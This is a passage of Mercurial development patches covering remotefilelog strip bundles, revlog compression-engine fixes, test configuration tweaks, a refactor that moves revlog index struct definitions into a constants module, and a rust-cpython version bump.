70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df + $ hg --hidden strip -r 1 3 + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg + + $ hg --hidden log -G -T '{rev} {node|short}' + o 1 70494d7ec5ef + | + @ 0 b292c1e3311f + +FIXME: This should point to a commit that actually exists in the repo. Otherwise +remotefilelog has to search every commit in the repository looking for a valid +linkrev every time it's queried, such as during push. + $ hg debug-file-linknode -r 70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1617744063 25200 # Tue Apr 06 14:21:03 2021 -0700 # Node ID 47a9527731c3c2aca078f949ce0980ea462f3c66 # Parent 2819df466cae70b26c0501f765aff1edfa8a90be remotefilelog: include file contents in bundles produced during strip `hg strip` and other things that use repair.strip (such as the narrow extension's `hg tracked --removeinclude`) will "save" some commits that have a higher revision number than the oldest commit we're stripping, but aren't actually descended from any of the commits that we're stripping. It saves them in a bundle, and then reapplies them to the repo. Remotefilelog doesn't generally participate in strip, it doesn't contribute files to either the backup bundle or the "saved" bundle, and doesn't adjust linknodes when commits are stripped. This can break things like push, which rely on the linknodes. This change makes it so that remotefilelog includes files in these bundles during strip operations. During reapplication, the files are reapplied from the bundle, and the linknode is properly updated. Differential Revision: https://phab.mercurial-scm.org/D10320 diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -215,6 +215,8 @@ configitem(b'remotefilelog', b'backgroundprefetch', default=False) configitem(b'remotefilelog', b'prefetchdelay', default=120) configitem(b'remotefilelog', b'prefetchdays', default=14) +# Other values include 'local' or 'none'. Any unrecognized value is 'all'. +configitem(b'remotefilelog', b'strip.includefiles', default='all') configitem(b'remotefilelog', b'getfilesstep', default=10000) configitem(b'remotefilelog', b'getfilestype', default=b'optimistic') diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -104,6 +104,18 @@ if source == b"push" or source == b"bundle": return AllFiles + # We won't actually strip the files, but we should put them in any + # backup bundle generated by strip (especially for cases like narrow's + # `hg tracked --removeinclude`, as failing to do so means that the + # "saved" changesets during a strip won't have their files reapplied and + # thus their linknode adjusted, if necessary). + if source == b"strip": + cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles') + if cfg == b'local': + return LocalFiles + elif cfg != b'none': + return AllFiles + caps = self._bundlecaps or [] if source == b"serve" or source == b"pull": if constants.BUNDLE2_CAPABLITY in caps: diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -63,6 +63,7 @@ > EOF $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-bundles.t b/tests/test-remotefilelog-bundles.t --- a/tests/test-remotefilelog-bundles.t +++ b/tests/test-remotefilelog-bundles.t @@ -26,12 +26,12 @@ $ hg strip -r 66ee28d0328c 1 files updated, 0 files merged, 0 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg adding changesets adding manifests adding file changes - added 2 changesets with 0 changes to 0 files + added 2 changesets with 2 changes to 1 files new changesets 66ee28d0328c:16db62c5946f (run 'hg update' to get a working copy) @@ -51,7 +51,7 @@ Pulling from a shallow bundle - $ hg strip -r 66ee28d0328c + $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg @@ -63,12 +63,13 @@ new changesets 66ee28d0328c (1 drafts) (run 'hg update' to get a working copy) -Pulling from a full bundle +Pulling from a full bundle, also testing that strip produces a full bundle by +default. $ hg strip -r 66ee28d0328c saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob) - $ hg pull -r 66ee28d0328c ../fullbundle.hg - pulling from ../fullbundle.hg + $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg + pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg searching for changes abort: cannot pull from full bundles (use `hg unbundle` instead) diff --git a/tests/test-remotefilelog-local.t b/tests/test-remotefilelog-local.t --- a/tests/test-remotefilelog-local.t +++ b/tests/test-remotefilelog-local.t @@ -116,7 +116,7 @@ $ hg strip -r . 2 files updated, 0 files merged, 1 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob) - 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob) # unbundle @@ -133,13 +133,14 @@ adding changesets adding manifests adding file changes - added 1 changesets with 0 changes to 0 files + added 1 changesets with 3 changes to 3 files new changesets 19edf50f4de7 (1 drafts) (run 'hg update' to get a working copy) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg up 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ cat a a @@ -148,7 +149,7 @@ $ clearcache $ hg revert -r .~2 y z no changes needed to z - 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ hg checkout -C -r . -q # explicit bundle should produce full bundle file @@ -159,7 +160,7 @@ $ cd .. $ hgcloneshallow ssh://user@dummy/master shallow2 -q - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ cd shallow2 $ hg unbundle ../local.bundle adding changesets diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -86,6 +86,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -48,6 +48,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg debugsparse --delete z diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t --- a/tests/test-remotefilelog-strip.t +++ b/tests/test-remotefilelog-strip.t @@ -60,8 +60,9 @@ | @ 0 b292c1e3311f -FIXME: This should point to a commit that actually exists in the repo. Otherwise -remotefilelog has to search every commit in the repository looking for a valid -linkrev every time it's queried, such as during push. +Demonstrate that the linknode points to a commit that is actually in the repo +after the strip operation. Otherwise remotefilelog has to search every commit in +the repository looking for a valid linkrev every time it's queried, such as +during push. $ hg debug-file-linknode -r 70494d a - df91f74b871e064c89afa1fe9e2f66afa2c125df + 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617727741 -7200 # Tue Apr 06 18:49:01 2021 +0200 # Node ID 19747c07ed3f20417dc89a88dfd7bbcc96cab41d # Parent 47a9527731c3c2aca078f949ce0980ea462f3c66 test: explicitly use zlib compression in tests/test-repo-compengines.t We need the implicit value to be explicit until we can change the default in some case. Differential Revision: https://phab.mercurial-scm.org/D10321 diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -1,5 +1,12 @@ A new repository uses zlib storage, which doesn't need a requirement + $ cat << EOF >> $HGRCPATH + > [format] + > # stabilize test accross variant + > revlog-compression=zlib + > EOF + + $ hg init default $ cd default $ cat .hg/requires # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617727832 -7200 # Tue Apr 06 18:50:32 2021 +0200 # Node ID 1a17c35fb9fd9e109b3ecdf22e682a9d610a961d # Parent 19747c07ed3f20417dc89a88dfd7bbcc96cab41d test: explicitly use zlib compression in tests/test-upgrade-repo.t We need the implicit value to be explicit until we can change the default in some case. Differential Revision: https://phab.mercurial-scm.org/D10322 diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -3,6 +3,9 @@ $ cat >> $HGRCPATH << EOF > [extensions] > share = + > [format] + > # stabilize test accross variant + > revlog-compression=zlib > EOF store and revlogv1 are required in source @@ -1144,6 +1147,7 @@ > maxchainlen = 9001 > EOF $ hg config format + format.revlog-compression=$BUNDLE2_COMPRESSIONS$ format.maxchainlen=9001 $ hg debugdeltachain file rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617747127 -7200 # Wed Apr 07 00:12:07 2021 +0200 # Node ID 9dfcadc2cabb30ead0b40cfbb9d692217ca1af7d # Parent 1a17c35fb9fd9e109b3ecdf22e682a9d610a961d test: explicitly use zlib compression in tests/test-share-safe.t We need the implicit value to be explicit until we can change the default in some case. Differential Revision: https://phab.mercurial-scm.org/D10323 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -7,6 +7,9 @@ > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow + > # enforce zlib to ensure we can upgrade to zstd later + > [format] + > revlog-compression=zlib > EOF prepare source repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617790528 -7200 # Wed Apr 07 12:15:28 2021 +0200 # Node ID 3aa78f2aea4884371ee2d5f230692462f47e0d5e # Parent 9dfcadc2cabb30ead0b40cfbb9d692217ca1af7d revlog-compression: fix computation of engine availability We don't just need the engine to be define, we need it to be available and able to do be used for revlog compression. Without this change, `zstd` could be selected as a viable option for repository creation on platform where it is not available. Differential Revision: https://phab.mercurial-scm.org/D10325 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3470,7 +3470,9 @@ compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: if compengine in util.compengines: - break + engine = util.compengines[compengine] + if engine.available() and engine.revlogheader(): + break else: raise error.Abort( _( diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -428,7 +428,9 @@ # return the first valid value as the selection code would do for comp in compengines: if comp in util.compengines: - return comp + e = util.compengines[comp] + if e.available() and e.revlogheader(): + return comp # no valide compression found lets display it all for clarity return b','.join(compengines) # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1617731359 14400 # Tue Apr 06 13:49:19 2021 -0400 # Node ID fbfb1d6d8459a06d0394872f65f5ceee9f180d47 # Parent 3aa78f2aea4884371ee2d5f230692462f47e0d5e revlog: fix error about unknown compression format in py3 In py2, the error is something like: abort: unknown compression type 'x'! In py3, we get the following unhelpful message: abort: unknown compression type <memory at 0x7f4650b5cdc8>! Switch to something like: abort: unknown compression type 78! Differential Revision: https://phab.mercurial-scm.org/D10318 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -13,6 +13,7 @@ from __future__ import absolute_import +import binascii import collections import contextlib import errno @@ -2296,7 +2297,9 @@ compressor = engine.revlogcompressor(self._compengineopts) self._decompressors[t] = compressor except KeyError: - raise error.RevlogError(_(b'unknown compression type %r') % t) + raise error.RevlogError( + _(b'unknown compression type %s') % binascii.hexlify(t) + ) return compressor.decompress(data) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698267 -7200 # Tue Apr 06 10:37:47 2021 +0200 # Node ID eed3e2b79b48aa8a1cb2f0656c72126d715346b2 # Parent fbfb1d6d8459a06d0394872f65f5ceee9f180d47 store: document the `walk` method Differential Revision: https://phab.mercurial-scm.org/D10313 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -452,7 +452,9 @@ return reversed(self._walk(b'', False)) def walk(self, matcher=None): - """yields (unencoded, encoded, size) + """return file related to data storage (ie: revlogs) + + yields (unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698275 -7200 # Tue Apr 06 10:37:55 2021 +0200 # Node ID 6afb5ef1e776e4b263e5c7873728b9601bb4e206 # Parent eed3e2b79b48aa8a1cb2f0656c72126d715346b2 store: drop the `filefilter` argument to `_walk` No code use it anywhere. Dropping it will help replacing the function with something with a more precise semantic. Differential Revision: https://phab.mercurial-scm.org/D10314 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -411,7 +411,7 @@ def join(self, f): return self.path + b'/' + encodedir(f) - def _walk(self, relpath, recurse, filefilter=isrevlog): + def _walk(self, relpath, recurse): '''yields (unencoded, encoded, size)''' path = self.path if relpath: @@ -425,7 +425,7 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if filefilter(f, kind, st): + if isrevlog(f, kind, st): n = util.pconvert(fp[striplen:]) l.append((decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618040 -7200 # Mon Apr 05 12:20:40 2021 +0200 # Node ID aba724bf550e69ea6ed1fa5aec2680dcacc86941 # Parent 6afb5ef1e776e4b263e5c7873728b9601bb4e206 revlog: add some comment in the header sections We are about to add more content so let us organise the existing content first. Differential Revision: https://phab.mercurial-scm.org/D10302 diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -11,11 +11,15 @@ from ..interfaces import repository -# revlog header flags +### main revlog header + +## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. REVLOGV2 = 0xDEAD + +## global revlog header flags # Shared across v1 and v2. FLAG_INLINE_DATA = 1 << 16 # Only used by v1, implied by v2. @@ -26,6 +30,8 @@ REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA REVLOGV2_FLAGS = FLAG_INLINE_DATA +### individual entry + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618052 -7200 # Mon Apr 05 12:20:52 2021 +0200 # Node ID 34e1fa4b548aedabaea646a918cba471f5266484 # Parent aba724bf550e69ea6ed1fa5aec2680dcacc86941 revlog: move the details of revlog "v0" index inside revlog.utils.constants the revlog module is quite large and this kind of format information would handy for other module. So let us start to gather this information about the format in a more appropriate place. Differential Revision: https://phab.mercurial-scm.org/D10303 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -41,6 +41,7 @@ from .revlogutils.constants import ( FLAG_GENERALDELTA, FLAG_INLINE_DATA, + INDEX_ENTRY_V0, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -218,19 +219,6 @@ node = attr.ib(default=None) -# index v0: -# 4 bytes: offset -# 4 bytes: compressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 20 bytes: parent 1 nodeid -# 20 bytes: parent 2 nodeid -# 20 bytes: nodeid -indexformatv0 = struct.Struct(b">4l20s20s20s") -indexformatv0_pack = indexformatv0.pack -indexformatv0_unpack = indexformatv0.unpack - - class revlogoldindex(list): @property def nodemap(self): @@ -284,7 +272,7 @@ class revlogoldio(object): def __init__(self): - self.size = indexformatv0.size + self.size = INDEX_ENTRY_V0.size def parseindex(self, data, inline): s = self.size @@ -295,7 +283,7 @@ while off + s <= l: cur = data[off : off + s] off += s - e = indexformatv0_unpack(cur) + e = INDEX_ENTRY_V0.unpack(cur) # transform to revlogv1 format e2 = ( offset_type(e[0], 0), @@ -315,6 +303,13 @@ return index, None def packentry(self, entry, node, version, rev): + """return the binary representation of an entry + + entry: a tuple containing all the values (see index.__getitem__) + node: a callback to convert a revision to nodeid + version: the changelog version + rev: the revision number + """ if gettype(entry[0]): raise error.RevlogError( _(b'index entry flags need revlog version 1') @@ -328,7 +323,7 @@ node(entry[6]), entry[7], ) - return indexformatv0_pack(*e2) + return INDEX_ENTRY_V0.pack(*e2) # index ng: diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -9,6 +9,8 @@ from __future__ import absolute_import +import struct + from ..interfaces import repository ### main revlog header @@ -32,6 +34,16 @@ ### individual entry +## index v0: +# 4 bytes: offset +# 4 bytes: compressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 20 bytes: parent 1 nodeid +# 20 bytes: parent 2 nodeid +# 20 bytes: nodeid +INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618061 -7200 # Mon Apr 05 12:21:01 2021 +0200 # Node ID cc65cea90edb704350e9987cf76a6953ea438f7c # Parent 34e1fa4b548aedabaea646a918cba471f5266484 revlog: move the details of revlog "v1" index inside revlog.utils.constants The revlog module is quite large and this kind of format information would handy for other module. So let us start to gather this information about the format in a more appropriate place. We update various reference to this information to use the new "source of truth" in the process. Differential Revision: https://phab.mercurial-scm.org/D10304 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -17,6 +17,7 @@ ) from ..revlogutils import nodemap as nodemaputil +from ..revlogutils import constants as revlog_constants stringio = pycompat.bytesio @@ -43,13 +44,13 @@ class BaseIndexObject(object): # Format of an index entry according to Python's `struct` language - index_format = b">Qiiiiii20s12x" + index_format = revlog_constants.INDEX_ENTRY_V1.format # Size of a C unsigned long long int, platform independent big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent int_size = struct.calcsize(b'>i') # Size of the entire index format - index_size = struct.calcsize(index_format) + index_size = revlog_constants.INDEX_ENTRY_V1.size # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -42,6 +42,7 @@ FLAG_GENERALDELTA, FLAG_INLINE_DATA, INDEX_ENTRY_V0, + INDEX_ENTRY_V1, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -326,18 +327,6 @@ return INDEX_ENTRY_V0.pack(*e2) -# index ng: -# 6 bytes: offset -# 2 bytes: flags -# 4 bytes: compressed length -# 4 bytes: uncompressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 4 bytes: parent 1 rev -# 4 bytes: parent 2 rev -# 32 bytes: nodeid -indexformatng = struct.Struct(b">Qiiiiii20s12x") -indexformatng_pack = indexformatng.pack versionformat = struct.Struct(b">I") versionformat_pack = versionformat.pack versionformat_unpack = versionformat.unpack @@ -349,7 +338,7 @@ class revlogio(object): def __init__(self): - self.size = indexformatng.size + self.size = INDEX_ENTRY_V1.size def parseindex(self, data, inline): # call the C implementation to parse the index data @@ -357,7 +346,7 @@ return index, cache def packentry(self, entry, node, version, rev): - p = indexformatng_pack(*entry) + p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: p = versionformat_pack(version) + p[4:] return p diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -44,6 +44,19 @@ # 20 bytes: nodeid INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") +## index v1 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") +assert INDEX_ENTRY_V1.size == 32 * 2 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618072 -7200 # Mon Apr 05 12:21:12 2021 +0200 # Node ID 85e3a630cad9aea93a2548a0a0fe329be74f7a11 # Parent cc65cea90edb704350e9987cf76a6953ea438f7c revlog: move the details of revlog "v2" index inside revlog.utils.constants the revlog module is quite large and this kind of format information would handy for other module. So let us start to gather this information about the format in a more appropriate place. We update various reference to this information to use the new "source of truth" in the process. Differential Revision: https://phab.mercurial-scm.org/D10305 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -243,21 +243,8 @@ class Index2Mixin(object): - # 6 bytes: offset - # 2 bytes: flags - # 4 bytes: compressed length - # 4 bytes: uncompressed length - # 4 bytes: base rev - # 4 bytes: link rev - # 4 bytes: parent 1 rev - # 4 bytes: parent 2 rev - # 32 bytes: nodeid - # 8 bytes: sidedata offset - # 4 bytes: sidedata compressed length - # 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) - index_format = b">Qiiiiii20s12xQi20x" - index_size = struct.calcsize(index_format) - assert index_size == 96, index_size + index_format = revlog_constants.INDEX_ENTRY_V2.format + index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -43,6 +43,7 @@ FLAG_INLINE_DATA, INDEX_ENTRY_V0, INDEX_ENTRY_V1, + INDEX_ENTRY_V2, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -87,7 +88,6 @@ storageutil, stringutil, ) -from .pure import parsers as pureparsers # blanked usage of all the name to prevent pyflakes constraints # We need these name available in the module for extensions. @@ -352,20 +352,16 @@ return p -indexformatv2 = struct.Struct(pureparsers.Index2Mixin.index_format) -indexformatv2_pack = indexformatv2.pack - - class revlogv2io(object): def __init__(self): - self.size = indexformatv2.size + self.size = INDEX_ENTRY_V2.size def parseindex(self, data, inline): index, cache = parsers.parse_index2(data, inline, revlogv2=True) return index, cache def packentry(self, entry, node, version, rev): - p = indexformatv2_pack(*entry) + p = INDEX_ENTRY_V2.pack(*entry) if rev == 0: p = versionformat_pack(version) + p[4:] return p diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -57,6 +57,21 @@ INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") assert INDEX_ENTRY_V1.size == 32 * 2 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +# 8 bytes: sidedata offset +# 4 bytes: sidedata compressed length +# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) +INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x") +assert INDEX_ENTRY_V2.size == 32 * 3 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618083 -7200 # Mon Apr 05 12:21:23 2021 +0200 # Node ID c6e23fb4bfb4b21ab02a713b84d377d09b91c660 # Parent 85e3a630cad9aea93a2548a0a0fe329be74f7a11 revlog: move the "index header" struct inside revlog.utils.constants The struct was previous called "version", but this is actually "version" + "flags". So header seems like a better name. The move to the `constants` module has the same motivation as the INDEX_ENTRY_V# ones. Differential Revision: https://phab.mercurial-scm.org/D10306 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -44,6 +44,7 @@ INDEX_ENTRY_V0, INDEX_ENTRY_V1, INDEX_ENTRY_V2, + INDEX_HEADER, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -327,10 +328,6 @@ return INDEX_ENTRY_V0.pack(*e2) -versionformat = struct.Struct(b">I") -versionformat_pack = versionformat.pack -versionformat_unpack = versionformat.unpack - # corresponds to uncompressed length of indexformatng (2 gigs, 4-byte # signed integer) _maxentrysize = 0x7FFFFFFF @@ -348,7 +345,7 @@ def packentry(self, entry, node, version, rev): p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -363,7 +360,7 @@ def packentry(self, entry, node, version, rev): p = INDEX_ENTRY_V2.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -579,7 +576,7 @@ else: indexdata = f.read() if len(indexdata) > 0: - versionflags = versionformat_unpack(indexdata[:4])[0] + versionflags = INDEX_HEADER.unpack(indexdata[:4])[0] self._initempty = False else: versionflags = newversionflags diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -15,6 +15,8 @@ ### main revlog header +INDEX_HEADER = struct.Struct(b">I") + ## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618118 -7200 # Mon Apr 05 12:21:58 2021 +0200 # Node ID 1dc86c2a43cedefe6f28ab4f988824b2b1fb438e # Parent c6e23fb4bfb4b21ab02a713b84d377d09b91c660 revlog: directly use the Struct object for related operation The Struct object has all the piece we needs, so no need to duplicate information on the revlog itself. Differential Revision: https://phab.mercurial-scm.org/D10307 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -44,7 +44,7 @@ class BaseIndexObject(object): # Format of an index entry according to Python's `struct` language - index_format = revlog_constants.INDEX_ENTRY_V1.format + index_format = revlog_constants.INDEX_ENTRY_V1 # Size of a C unsigned long long int, platform independent big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent @@ -99,7 +99,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(self.index_format, *tup) + data = self.index_format.pack(*tup) self._extra.append(data) def _check_index(self, i): @@ -117,7 +117,7 @@ else: index = self._calculate_index(i) data = self._data[index : index + self.index_size] - r = _unpack(self.index_format, data) + r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -243,7 +243,7 @@ class Index2Mixin(object): - index_format = revlog_constants.INDEX_ENTRY_V2.format + index_format = revlog_constants.INDEX_ENTRY_V2 index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618132 -7200 # Mon Apr 05 12:22:12 2021 +0200 # Node ID c7c6c11fe1e4fd3b936b2145b112bd8006a88ba6 # Parent 1dc86c2a43cedefe6f28ab4f988824b2b1fb438e rust: bump rust-cpython version to 0.5.2 we need a newer version to define "property" on Rust defined object. Differential Revision: https://phab.mercurial-scm.org/D10308 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -139,12 +139,13 @@ [[package]] name = "cpython" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" +checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472" dependencies = [ "libc", "num-traits", + "paste", "python27-sys", 